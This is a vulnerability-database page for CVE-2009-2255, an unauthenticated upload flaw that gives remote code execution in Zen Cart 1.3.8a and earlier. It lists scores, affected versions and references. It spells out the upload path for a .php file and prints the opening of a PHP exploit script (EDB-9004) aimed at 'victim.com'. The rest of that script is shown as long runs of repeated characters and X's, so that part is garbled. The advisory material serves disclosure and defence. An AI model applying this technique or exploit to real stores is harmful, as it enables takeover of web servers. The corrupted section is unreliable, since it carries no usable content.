CVE-2009-2255

CVE Descriptions

Zen Cart 1.3.8a, 1.3.8, and earlier does not require administrative authentication for admin/record_company.php, which allows remote attackers to execute arbitrary code by uploading a .php file via the record_company_image parameter in conjunction with a PATH_INFO of password_forgotten.php, then accessing this file via a direct request to the file in images/.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-287	Improper Authentication When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	6.8		AV:N/AC:M/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	15.61%	–	–
2022-04-03	–	–	15.61%	–	–
2023-03-12	–	–	–	32.77%	–
2023-10-08	–	–	–	30.71%	–
2023-11-19	–	–	–	30.71%	–
2023-12-03	–	–	–	30.71%	–
2023-12-17	–	–	–	30.71%	–
2024-06-02	–	–	–	30.71%	–
2024-12-22	–	–	–	57.39%	–
2025-01-19	–	–	–	57.39%	–
2025-03-18	–	–	–	–	31.22%
2025-03-18	–	–	–	–	31.22,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	93%
2022-04-03	96%
2023-03-12	96%
2023-10-08	96%
2023-11-19	97%
2023-12-03	96%
2023-12-17	97%
2024-06-02	97%
2024-12-22	98%
2025-01-19	98%
2025-03-18	96%
2025-03-18	96%

Exploit information

Exploit Database EDB-ID : 9004

Publication date : 2009-06-22 22h00 +00:00
Author : BlackH
EDB Verified : Yes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/php
<?php
#
# ------- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a)  is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 2)
{
echo "
=___________ Zen Cart 1.3.8 Remote Code Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| \$system> php $argv[0] <url>                                        |
| Notes: <url>      ex: http://victim.com/site (no slash)              |
 
 
הההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההההה
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Products Mentioned

Configuraton 0

Zen-cart>>Zen_cart >> Version To (including) 1.3.8a

Zen-cart>>Zen_cart >> Version - (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.1.0 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.1.3 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.0d (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.1 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.1d (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.2d (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.3d (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.4.1 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.4d (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.5d (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.2.6d (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.0.1 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.0.2 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.0.2 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.2 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.5 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.6 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.7 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.8 (Open CPE detail)
Zen-cart>>Zen_cart >> Version 1.3.8a (Open CPE detail)

Zen-cart>>Zen_cart >> Version 1.1.0

Zen-cart>>Zen_cart >> Version 1.1.0 (Open CPE detail)

Zen-cart>>Zen_cart >> Version 1.1.3

Zen-cart>>Zen_cart >> Version 1.1.3 (Open CPE detail)

Zen-cart>>Zen_cart >> Version 1.2.0d

Zen-cart>>Zen_cart >> Version 1.2.0d (Open CPE detail)

Zen-cart>>Zen_cart >> Version 1.2.1d

Zen-cart>>Zen_cart >> Version 1.2.1d (Open CPE detail)

Zen-cart>>Zen_cart >> Version 1.2.4d

Zen-cart>>Zen_cart >> Version 1.2.4d (Open CPE detail)

Zen-cart>>Zen_cart >> Version 1.3.6

Zen-cart>>Zen_cart >> Version 1.3.6 (Open CPE detail)

Zen-cart>>Zen_cart >> Version 1.3.7

Zen-cart>>Zen_cart >> Version 1.3.7 (Open CPE detail)

Zen-cart>>Zen_cart >> Version 1.3.8

Zen-cart>>Zen_cart >> Version 1.3.8 (Open CPE detail)

References

http://www.securityfocus.com/bid/35467
Tags : vdb-entry, x_refsource_BID

http://www.osvdb.org/55344
Tags : vdb-entry, x_refsource_OSVDB

http://www.zen-cart.com/forum/showthread.php?t=130161
Tags : x_refsource_CONFIRM

https://exchange.xforce.ibmcloud.com/vulnerabilities/51316
Tags : vdb-entry, x_refsource_XF

http://www.zen-cart.com/forum/attachment.php?attachmentid=5965
Tags : x_refsource_CONFIRM

http://www.exploit-db.com/exploits/9004
Tags : exploit, x_refsource_EXPLOIT-DB

http://secunia.com/advisories/35550
Tags : third-party-advisory, x_refsource_SECUNIA

CVE-2009-2255 : Detail